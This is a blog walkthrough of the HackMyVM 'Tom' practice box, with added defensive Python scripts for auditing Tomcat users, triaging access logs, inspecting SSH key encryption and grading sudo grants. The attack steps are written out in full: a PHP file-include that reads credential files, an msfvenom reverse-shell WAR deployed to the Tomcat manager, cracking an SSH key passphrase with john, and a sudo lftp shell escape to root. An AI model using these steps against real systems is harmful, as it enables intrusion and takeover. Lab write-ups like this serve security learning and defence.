Windy's little blog

All the odds and ends of life, and I like CTF.

HackMyVm Tom Walkthrough

Key points: Tomcat configuration and WAR upload.

Scan ports.

 ~ nmap -sV -sC -p-  -Pn  -oN ports.log                                       
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 Starting Nmap 7.91 ( ) at 2021-10-16 09:56 CST
 Nmap scan report for deathnote.vuln (
 Host is up (0.00073s latency).
 Not shown: 65532 closed ports
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 55:5f:3f:15:c7:cb:5f:09:d6:a1:f5:70:06:d0:dd:bc (RSA)
 |   256 ec:db:41:19:b8:60:bc:53:6f:c7:ef:c6:d3:ee:b9:b8 (ECDSA)
 |_  256 2e:0d:03:27:a5:2a:0b:4e:b0:6a:42:01:57:fd:a9:9f (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 8080/tcp open  http    Apache Tomcat 9.0.54
 |_http-favicon: Apache Tomcat
 |_http-title: Apache Tomcat/9.0.54
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel        

Enumerate port 80.

 ~ gobuster dir -u -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log 
 /index.html           (Status: 200) [Size: 10701]
 /javascript           (Status: 301) [Size: 321] [-->]
 /tomcat.php           (Status: 200) [Size: 0]              

Fuzz tomcat.php for a parameter name (--hh 0 hides the empty responses, so only a parameter that returns content shows up).

 ~ wfuzz -u ''    -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 ID           Response   Lines    Word       Chars       Payload
 000007570:   200        27 L     39 W       1441 Ch     "filez"          

Read /etc/passwd through the filez parameter.

 ~ curl ''       

We need Tomcat's home directory, so read its service unit file.

 ~ curl ''
 Description=Tomcat 9 servlet container
 Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"

Check the password file under Tomcat's home directory.

 ~ curl '' 
 <role rolename="admin-gui"/>
 <role rolename="manager-script"/>
 <user username="sml" password="H4ckMyP4$$w0rD!!!" roles="admin-gui,manager-script"/>
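The credentials above were readable because the Tomcat user file sat where the web server's PHP could include it, and the account carries both admin-gui and manager-script. The following audit script is an added example for this walkthrough, not code from the original post or from Tomcat: it parses a tomcat-users.xml, lists every account holding a Manager/Host Manager role, and reports whether the file is world-readable. The XML sample is constructed (password replaced with a placeholder), and the PRIVILEGED_ROLES set is an assumption based on Tomcat's built-in role names.

```python
"""Audit tomcat-users.xml for manager/admin accounts and loose file permissions."""
import os
import stat
import sys
import xml.etree.ElementTree as ET

# Assumed list: Tomcat's built-in roles that grant control of the Manager and
# Host Manager apps (deploy/undeploy, JMX proxy, status pages).
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}

# Constructed sample in the shape of a real tomcat-users.xml (passwords redacted).
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <role rolename="probeuser"/>
  <user username="sml" password="REDACTED" roles="admin-gui,manager-script"/>
  <user username="ops" password="REDACTED" roles="manager-status"/>
  <user username="app" password="REDACTED" roles="probeuser"/>
</tomcat-users>
"""


def _local(tag):
    """Drop the {namespace} prefix ElementTree attaches when xmlns is declared."""
    return tag.rsplit("}", 1)[-1]


def privileged_users(xml_text):
    """Map username -> sorted list of privileged roles, for users holding any."""
    root = ET.fromstring(xml_text)
    found = {}
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        hits = sorted(roles & PRIVILEGED_ROLES)
        if hits:
            found[el.get("username")] = hits
    return found


def is_world_readable(mode):
    """True when the 'other' read bit is set (e.g. 0o644)."""
    return bool(mode & stat.S_IROTH)


def audit_file(path):
    """Run both checks against a file on disk."""
    with open(path, encoding="utf-8") as fh:
        users = privileged_users(fh.read())
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return {
        "path": path,
        "mode": oct(mode),
        "world_readable": is_world_readable(mode),
        "privileged_users": users,
    }


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(audit_file(sys.argv[1]))  # e.g. python3 audit.py $CATALINA_HOME/conf/tomcat-users.xml
    else:
        print(privileged_users(SAMPLE_TOMCAT_USERS))
```

A clean result is an empty dictionary from privileged_users (or only accounts you expect) and a mode that keeps the file unreadable by the account the web server runs as. Note that a stock Tomcat 9 manager app also ships a RemoteAddrValve in its context.xml that limits it to localhost; on this box the manager accepted a remote upload, so that valve had been loosened or removed as well.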

Generate a reverse-shell WAR for Tomcat and upload it through the manager.

 ~ msfvenom  -p java/shell_reverse_tcp lhost= lport=1234 -f war -o rev.war       
 Payload size: 13323 bytes
 Final size of war file: 13323 bytes
 Saved as: rev.war
 ~ curl --upload-file rev.war  -u 'sml:H4ckMyP4$$w0rD!!!' ''
 OK - Desplegada aplicación en trayectoria de contexto [/upload]
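Every step of the web phase above leaves a line in an access log: the filez reads of /etc/passwd, the service unit and the Tomcat user file, and then the WAR deployment through the manager. This triage script is an added example for this walkthrough, not code from the original post: it parses common-format access-log lines, decodes query-string values twice to catch %25-encoded traversal, and flags file-include probes and manager deployments. The log lines are constructed to mirror the walkthrough's traffic, TOMCAT_HOME is a placeholder for the install path the post does not show, and SENSITIVE_FILES and STREAM_WRAPPERS are assumed watch-lists.

```python
"""Triage web access logs for file-include probes and Tomcat Manager deployments."""
import re
from urllib.parse import parse_qsl, unquote

# Apache / Tomcat "common" access-log line; fields after the size are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed watch-lists: files an include bug is usually pointed at first, and
# PHP stream wrappers that turn a file read into something worse.
SENSITIVE_FILES = (
    "/etc/passwd", "/etc/shadow", "/proc/self/", "/etc/systemd/",
    "tomcat-users.xml", ".ssh/", ".bash_history",
)
STREAM_WRAPPERS = ("php://", "file://", "data:", "expect://", "zip://", "phar://")

# Constructed sample log mirroring the walkthrough's traffic (not a real capture).
# TOMCAT_HOME is a placeholder for the install path the post does not show.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Oct/2021:10:20:01 +0800] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Oct/2021:10:29:59 +0800] "GET /tomcat.php?filez=/etc/passwd HTTP/1.1" 200 1441 "-" "curl/7.79"
10.0.0.5 - - [16/Oct/2021:10:30:10 +0800] "GET /tomcat.php?filez=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1441 "-" "curl/7.79"
10.0.0.5 - - [16/Oct/2021:10:31:45 +0800] "GET /tomcat.php?filez=/TOMCAT_HOME/conf/tomcat-users.xml HTTP/1.1" 200 902 "-" "curl/7.79"
10.0.0.5 - - [16/Oct/2021:10:32:00 +0800] "GET /tomcat.php?filez=about.txt HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.5 - sml [16/Oct/2021:10:40:12 +0800] "PUT /manager/text/deploy?path=/upload HTTP/1.1" 200 61 "-" "curl/7.79"
"""


def classify_value(raw):
    """Reasons a query-string value looks like a file-include probe ([] if clean)."""
    value = unquote(raw)  # parse_qsl decoded once already; decode again for %25xx
    reasons = []
    if "../" in value or "..\\" in value:
        reasons.append("path traversal")
    if "\x00" in value:
        reasons.append("null byte")
    if any(name in value for name in SENSITIVE_FILES):
        reasons.append("sensitive file")
    if value.lower().startswith(STREAM_WRAPPERS):
        reasons.append("stream wrapper")
    return reasons


def classify_request(method, path):
    """Flag writes to the Tomcat Manager text/HTML interfaces (deploy, undeploy, upload)."""
    if path.startswith(("/manager/text/", "/manager/html/")):
        if method in ("PUT", "POST") or any(a in path for a in ("/deploy", "/undeploy", "/upload")):
            return ["tomcat manager deployment"]
    return []


def scan_access_log(text):
    """Return one finding per suspicious request or parameter, in log order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a production version would count these
        path, _, query = m.group("target").partition("?")
        hits = [(None, path, classify_request(m.group("method"), path))]
        hits += [(p, unquote(v), classify_value(v))
                 for p, v in parse_qsl(query, keep_blank_values=True)]
        for param, value, reasons in hits:
            if reasons:
                findings.append({
                    "line": lineno, "ip": m.group("ip"), "user": m.group("user"),
                    "status": int(m.group("status")), "param": param,
                    "value": value, "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        label = f["param"] or "path"
        print(f"line {f['line']}: {f['ip']} {label}={f['value']} -> {', '.join(f['reasons'])}")
```

On the sample the script flags lines 2, 3, 4 and 6 and leaves the ordinary page loads alone. A 200 status on a flagged line is the part worth alerting on; traversal probes that return 404 are noise, traversal probes that return a 1441-byte body are a working include.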

Get a reverse shell.

 ~ curl ''
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 uid=1001(tomcat) gid=1001(tomcat) grupos=1001(tomcat)

Check sudo -l.

 tomcat@tom:/var/www/html$ sudo -l
 sudo -l
 Matching Defaults entries for tomcat on tom:
     env_reset, mail_badpass,
 User tomcat may run the following commands on tom:
     (nathan) NOPASSWD: /usr/bin/ascii85

Read user nathan's id_rsa.

 sudo -u nathan /usr/bin/ascii85 /home/nathan/.ssh/id_rsa -w 0

Decode the ascii85 output online to recover id_rsa; the key is encrypted.

 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,5065755920B77C45

Crack the passphrase of id_rsa.

 ~ /usr/share/john/ id_rsa  > hash
 ~ john --wordlist=/usr/share/wordlists/rockyou.txt hash
 Using default input encoding: UTF-8
 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
 Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
 Cost 2 (iteration count) is 2 for all loaded hashes
 Will run 2 OpenMP threads
 Note: This format may emit false positives, so it will keep trying even after
 finding a possible candidate.
 Press 'q' or Ctrl-C to abort, almost any other key for status
 darkness         (id_rsa)
 1g 0:00:00:29 81.06% (ETA: 11:09:00) 0.03336g/s 387097p/s 387097c/s 387097C/s 9405es..9405872
 Session aborted
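Two things in the key-recovery steps above deserve a closer look: the ascii85 blob was decoded on a third-party website, and john's "Cost 1 ... 1=MD5/3DES" line explains why a rockyou run finished in 29 seconds. The script below is an added example for this walkthrough, not code from the original post: it decodes ascii85 locally with the standard library (so a private key never leaves the machine) and inspects the PEM header to report the cipher and whether the key uses the legacy PEM encryption, whose key derivation is a single MD5 round with no work factor. The PEM sample is constructed around the header lines shown above with a fake body; the ascii85 input is produced by a85encode and stands in for the output of the ascii85 binary.

```python
"""Decode ascii85 locally and classify how an SSH private key is protected."""
import base64
import re

# Constructed sample: the header lines from the walkthrough over a fake body.
SAMPLE_PEM = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,5065755920B77C45

CONSTRUCTED-FAKE-KEY-BODY-NOT-A-REAL-KEY
-----END RSA PRIVATE KEY-----
"""

# Stands in for what `ascii85 id_rsa -w 0` would print for that file.
SAMPLE_ASCII85 = base64.a85encode(SAMPLE_PEM.encode()).decode("ascii")


def decode_ascii85(text):
    """Decode ascii85 text, tolerating line wrapping and optional <~ ~> framing."""
    data = "".join(text.split())  # ascii85 uses no whitespace, so drop all of it
    if data.startswith("<~") and data.endswith("~>"):
        data = data[2:-2]  # Adobe framing, if the encoder added it
    return base64.a85decode(data.encode("ascii"))


def pem_encryption_info(pem_text):
    """Report key format, cipher and whether the legacy (weak-KDF) PEM encryption is used."""
    info = {"format": None, "encrypted": False, "cipher": None, "legacy_kdf": False}
    if "-----BEGIN OPENSSH PRIVATE KEY-----" in pem_text:
        # New format: cipher and bcrypt rounds live inside the base64 blob.
        info["format"] = "openssh-v1"
        return info
    if re.search(r"^-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", pem_text, re.M):
        info["format"] = "pem-legacy"
    dek = re.search(r"^DEK-Info:\s*([A-Za-z0-9-]+),([0-9A-Fa-f]+)\s*$", pem_text, re.M)
    if dek and re.search(r"^Proc-Type:\s*4,ENCRYPTED", pem_text, re.M):
        info["encrypted"] = True
        info["cipher"] = dek.group(1)
        # Legacy PEM derives the key with EVP_BytesToKey: one MD5 pass, no
        # iteration count, so every guess costs one hash plus one block decrypt.
        info["legacy_kdf"] = True
    return info


def recover_and_inspect(ascii85_text):
    """Full pipeline: ascii85 text -> key bytes -> protection summary."""
    key_bytes = decode_ascii85(ascii85_text)
    return key_bytes, pem_encryption_info(key_bytes.decode("utf-8", errors="replace"))


if __name__ == "__main__":
    key, info = recover_and_inspect(SAMPLE_ASCII85)
    print(info)
```

For a key that reports legacy_kdf, the fix on the owner's side is to re-encrypt it into the OpenSSH format with a bcrypt work factor (ssh-keygen -p -a 100 -f id_rsa; recent OpenSSH writes the new format by default), which turns the 387k guesses per second seen above into a handful.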

Log in over SSH as user nathan and check sudo -l.

 ~ ssh nathan@ -i id_rsa
 Enter passphrase for key 'id_rsa':
 Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
 /usr/bin/xauth:  file /home/nathan/.Xauthority does not exist
 nathan@tom:~$ sudo -l
 Matching Defaults entries for nathan on tom:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User nathan may run the following commands on tom:
     (root) NOPASSWD: /usr/bin/lftp
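Both privilege escalations on this box come from the same class of sudoers mistake: a NOPASSWD grant on a binary that can either read arbitrary files (ascii85) or drop to a shell (lftp's ! escape, used in the next step). The script below is an added example for this walkthrough, not code from the original post: it parses the output of sudo -l as shown in the two listings above and rates each grant. The KNOWN_ESCAPES table is an assumption covering a handful of common binaries; extend it for your environment.

```python
"""Parse `sudo -l` output and flag grants that amount to handing over the run-as user."""
import re

# Assumed table: why a NOPASSWD grant on these binaries is effectively unrestricted.
KNOWN_ESCAPES = {
    "lftp": "shell escape: '!cmd' runs a shell as the run-as user",
    "ascii85": "reads any file the run-as user can read (SSH keys, hashes)",
    "vim": "shell escape via :!cmd",
    "vi": "shell escape via :!cmd",
    "less": "shell escape via !cmd",
    "more": "shell escape via !cmd",
    "man": "shell escape via !cmd",
    "ftp": "shell escape via !cmd",
    "python3": "can spawn a shell",
    "perl": "can spawn a shell",
    "bash": "is a shell",
    "sh": "is a shell",
}

# The two listings from the walkthrough, used here as sample input.
SUDO_L_TOMCAT = """\
Matching Defaults entries for tomcat on tom:
    env_reset, mail_badpass,
User tomcat may run the following commands on tom:
    (nathan) NOPASSWD: /usr/bin/ascii85
"""
SUDO_L_NATHAN = r"""Matching Defaults entries for nathan on tom:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User nathan may run the following commands on tom:
    (root) NOPASSWD: /usr/bin/lftp
"""

# "(runas[ : group]) [TAG: ...] cmd[, cmd...]"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(text):
    """Return one dict per command grant found after the 'may run' header."""
    entries = []
    in_cmds = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds:
            continue  # Defaults block; nothing to grade there
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(root : root)" -> root
        tags = {t.strip(": ") for t in m.group("tags").split() if t.strip(": ")}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            entries.append({
                "runas": runas, "nopasswd": "NOPASSWD" in tags,
                "command": cmd, "binary": binary,
            })
    return entries


def audit_sudo_l(text):
    """Attach a list of risk statements to every parsed grant."""
    findings = []
    for e in parse_sudo_l(text):
        risks = []
        if e["nopasswd"]:
            risks.append("no password required")
        if e["runas"] in ("root", "ALL"):
            risks.append("runs as root")
        if e["command"] == "ALL":
            risks.append("unrestricted command")
        if e["binary"] in KNOWN_ESCAPES:
            risks.append(KNOWN_ESCAPES[e["binary"]])
        findings.append({**e, "risks": risks})
    return findings


if __name__ == "__main__":
    for listing in (SUDO_L_TOMCAT, SUDO_L_NATHAN):
        for f in audit_sudo_l(listing):
            print(f"({f['runas']}) {f['command']}: {'; '.join(f['risks'])}")
```

A grant whose risk list contains both "no password required" and a KNOWN_ESCAPES entry is a full takeover of the run-as account; the remedy is to remove the grant or replace the binary with a wrapper script that hard-codes the arguments and runs with a password prompt.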

Get root.

 nathan@tom:~$ sudo lftp
 lftp :~> !id
 uid=0(root) gid=0(root) grupos=0(root)
 lftp :~> !bash
 root@tom:/home/nathan# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)


